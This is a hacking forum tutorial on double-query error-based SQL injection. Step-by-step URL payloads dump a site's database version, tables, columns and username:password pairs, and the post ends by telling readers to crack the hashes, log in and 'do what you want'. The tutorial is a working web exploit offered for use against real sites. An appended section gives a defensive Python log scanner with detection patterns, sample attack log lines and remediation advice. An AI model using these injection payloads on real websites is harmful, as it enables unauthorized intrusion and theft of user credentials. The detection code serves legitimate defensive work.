SQL injection [Double Query Error Based]
Asalam O Alaikum
This tutorial is about how to hack a website through double query error-based SQL injection.
So for this, first you need a vulnerable site.
OK, after getting a vulnerable site, get the column count as normal.
Suppose it has 4 columns, so your next command will be:
Code:
www.vulnsite.com/index.php?id=-12 union select 1,2,3,4--
But when you press enter it gives an error. The error is:
Code:
(select statement have different numbers of column)
So now what?
Don't be confused, it's time to use double query SQL injection.
So your command will look like this:
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(version())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
and the result will look like this:
Code:
"Duplicate entry '5.0.92-community-log1' for key 1"
So here '5.0.92-community-log1' is the site's version (the final 1 is the floor(Rand(0)*2) value that concat appends).
Now we have to find the site's current_user, so our command will be:
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(current_user())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry user+1' for key 1"
OK, now we will find tables with this command:
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result should be
Code:
"duplicate entry 'table_name1' for key 1'
Now keep increasing the limit; you can find it near:
Code:
((table_name)+from+information_schema.tables+limit+0,1) )
Here change the limit '0,1' to 1,1, then 2,1, until you get the error.
OK, now we will find the tables which contain the data, so our command will be:
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"duplicate entry tablename1' for key 1"
So here again increase the limit's value until you get a table like user, admin, login, etc.
OK, now suppose we have the table name "user", so the next step is to find the columns of this table. Our command will be:
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(column_name)+from+information_schema.columns+where+table_name=<hex value of table>+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry 'column name1' for key 1'
You can change text to hex here: http://www.swingnote.com/tools/texttohex.php
Again keep changing the limit's value until you get columns like username, password, etc.
OK, now we have the columns username and password, and we need the data inside the columns, so our command will be:
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(username,0x3a,password)+from+user+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry 'Admin:452875204827e1f25994a3da414587125' for key 1"
If the password is in hashes then you have to crack that hash. You can crack that hash with a site, namely:
Code:
http://md5decrypter.co.uk
So you got the user and pass; log in, do what you guys want and enjoy.
POSTED BY HASAN AFAQUE (Admin)
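From the defender's side, the requests shown above leave a recognizable shape in web server logs. The following is an added example, not part of the original post: a Python scanner that decodes each logged request and flags the `floor(rand(0)*2)` plus `count(*) ... group by` combination. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signals taken from the payload shape shown in the tutorial above.
SIGNALS = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\)"),
    "count_group_by": re.compile(r"count\s*\(\s*\*\s*\).*group\s+by"),
    "information_schema": re.compile(r"information_schema\s*\.\s*(tables|columns)"),
    "nested_select_concat": re.compile(r"concat\s*\(\s*\(\s*select"),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log (documentation IP ranges); entries 2 and 3 reuse the page's payload.
SAMPLE_LOG = "\n".join([
    '198.51.100.4 - - [10/Mar/2024:10:00:01 +0000] "GET /index.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Mar/2024:10:00:05 +0000] "GET /index.php?id=-12+and+(select+1+from'
    '(select%20count(*),concat((select+concat(version())+from+information_schema.tables+limit'
    '+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b) HTTP/1.1" 200 312',
    '203.0.113.9 - - [10/Mar/2024:10:00:09 +0000] "GET /index.php?id=-12%2520and%2520(select'
    '%25201%2520from(select%2520count(*),concat((select%2520current_user()),floor(rand(0)*2))a'
    '%2520from%2520information_schema.tables%2520group%2520by%2520a)b) HTTP/1.1" 500 0',
    '198.51.100.4 - - [10/Mar/2024:10:00:12 +0000] "GET /search.php?q=group+by+floor+plan HTTP/1.1" 200 900',
])

def normalize(raw):
    """URL-decode (up to 3 passes, for double encoding), drop /**/ comments, lowercase."""
    for _ in range(3):
        decoded = unquote_plus(raw)
        if decoded == raw:
            break
        raw = decoded
    raw = re.sub(r"/\*.*?\*/", " ", raw, flags=re.S)
    return re.sub(r"\s+", " ", raw.lower())

def scan_line(line):
    """Return (client, status, signal names) for a suspicious request, else None."""
    m = REQUEST.match(line)
    query = normalize(m.group(2).partition("?")[2]) if m else ""
    hits = [name for name, rx in SIGNALS.items() if rx.search(query)]
    # floor(rand()*2) together with count(*) ... group by is the duplicate-key core.
    if "floor_rand" in hits and "count_group_by" in hits:
        return m.group(1), int(m.group(3)), hits

def scan(log_text):
    return [hit for hit in map(scan_line, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for client, status, hits in scan(SAMPLE_LOG):
        print(client, status, ",".join(hits))
```

Repeated hits from one client with only the `limit` offset changing indicate enumeration in progress. The root fix is parameterized queries and not returning database error text such as "Duplicate entry ... for key" to the client.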